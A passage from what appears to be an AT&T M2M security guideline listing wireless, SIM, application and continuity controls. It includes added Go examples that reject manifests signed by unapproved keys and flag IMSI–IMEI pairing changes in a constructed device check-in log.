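	rogue := Publish(bundle, "corp-release-2011", privRogue) // claims the approved id
	fmt.Println("signed by unapproved key:", Authorize(bundle, rogue, approved))
}
```

The signer identifier in the manifest is untrusted input: it only selects which approved public key to try, and the signature check is what binds the manifest to that key, so a publisher cannot gain approval simply by claiming an approved identifier.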
Machine to Machine (M2M) Security
a. M2M Wireless Device:
Wireless should include
‐ UMTS encryption (UEA1, the KASUMI-based
confidentiality algorithm; KASUMI is specified in
3GPP Technical Specification 35.202).
SIM security should include
‐ IMSI – IMEI tracking and change notification
[where IMSI = International Mobile Subscriber
Identity (subscriber ID / network routing number) and
IMEI = International Mobile Equipment Identity
(mobile device ID)]
‐ SIM PIN locking
‐ Solderable (non-removable) SIMs
b. Application Security should include
‐ End to end VPN
c. Business Continuity should include
‐ Redundant devices and connection paths.
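The following is an added worked example, not part of the EMSS text, of the "IMSI – IMEI tracking and change notification" control under M2M SIM security. It is Go using only the standard library: each network check-in carries the device's IMEI and the IMSI of the SIM it used, the tracker remembers the last-seen pairing in both directions, and it raises a "sim-moved" alert when a known SIM appears in a different device (SIM pulled from a field unit and reused) and a "sim-changed" alert when a known device appears with a different SIM. The "time,imei,imsi" log format and the sample records are constructed for this example; the IMEI values are the standard documentation examples and the IMSIs are made up.

```go
package main

import (
	"fmt"
	"strings"
)

// CheckIn is one network attach record from an M2M device: the equipment
// identity (IMEI) and the subscriber identity (IMSI) of the SIM it used.
type CheckIn struct {
	Time string
	IMEI string
	IMSI string
}

// Alert is raised when an IMEI/IMSI pairing differs from the last one seen.
type Alert struct {
	Time   string
	Kind   string // "sim-changed": device now carries a different SIM; "sim-moved": SIM now in a different device
	IMEI   string
	IMSI   string
	Before string // the identifier the pairing previously carried
}

// Tracker keeps the last-known pairing in both directions.
type Tracker struct {
	simInDevice map[string]string // IMEI -> IMSI
	deviceOfSim map[string]string // IMSI -> IMEI
}

func NewTracker() *Tracker {
	return &Tracker{simInDevice: map[string]string{}, deviceOfSim: map[string]string{}}
}

// Observe records a check-in and returns any alerts it triggers. The first
// sighting of an identifier only enrols it; later sightings are compared
// against the stored pairing, then the pairing is updated.
func (t *Tracker) Observe(c CheckIn) []Alert {
	var alerts []Alert
	if prev, seen := t.simInDevice[c.IMEI]; seen && prev != c.IMSI {
		alerts = append(alerts, Alert{Time: c.Time, Kind: "sim-changed", IMEI: c.IMEI, IMSI: c.IMSI, Before: prev})
	}
	if prev, seen := t.deviceOfSim[c.IMSI]; seen && prev != c.IMEI {
		alerts = append(alerts, Alert{Time: c.Time, Kind: "sim-moved", IMEI: c.IMEI, IMSI: c.IMSI, Before: prev})
	}
	t.simInDevice[c.IMEI] = c.IMSI
	t.deviceOfSim[c.IMSI] = c.IMEI
	return alerts
}

// ParseCheckIns reads "time,imei,imsi" lines, a constructed log format for
// this example; real attach records come from the carrier or the MDM feed.
func ParseCheckIns(log string) []CheckIn {
	var out []CheckIn
	for _, line := range strings.Split(strings.TrimSpace(log), "\n") {
		f := strings.Split(strings.TrimSpace(line), ",")
		if len(f) != 3 {
			continue // skip malformed lines rather than guess
		}
		out = append(out, CheckIn{Time: f[0], IMEI: f[1], IMSI: f[2]})
	}
	return out
}

// Scan runs a whole log through a fresh tracker and returns every alert.
func Scan(log string) []Alert {
	t := NewTracker()
	var all []Alert
	for _, c := range ParseCheckIns(log) {
		all = append(all, t.Observe(c)...)
	}
	return all
}

// SampleLog is constructed: device A checks in twice with its SIM, then that
// SIM turns up in device B, then device A reappears with a different SIM.
const SampleLog = `
2011-06-01T08:00,356938035643809,310410123456789
2011-06-01T20:00,356938035643809,310410123456789
2011-06-02T03:15,490154203237518,310410123456789
2011-06-02T09:40,356938035643809,310410999999999
`

func main() {
	for _, a := range Scan(SampleLog) {
		fmt.Printf("%s %-11s IMEI=%s IMSI=%s (was %s)\n", a.Time, a.Kind, a.IMEI, a.IMSI, a.Before)
	}
}
```

On the sample the second record produces no alert because the pairing is unchanged, the third produces "sim-moved" (the SIM from device A is now in device B), and the fourth produces "sim-changed" (device A is back on the network with a new SIM). Which of the two conditions matters more depends on the deployment: a planned SIM replacement explains the second, while the first is the pattern of a SIM stolen from an unattended field unit.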
© 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.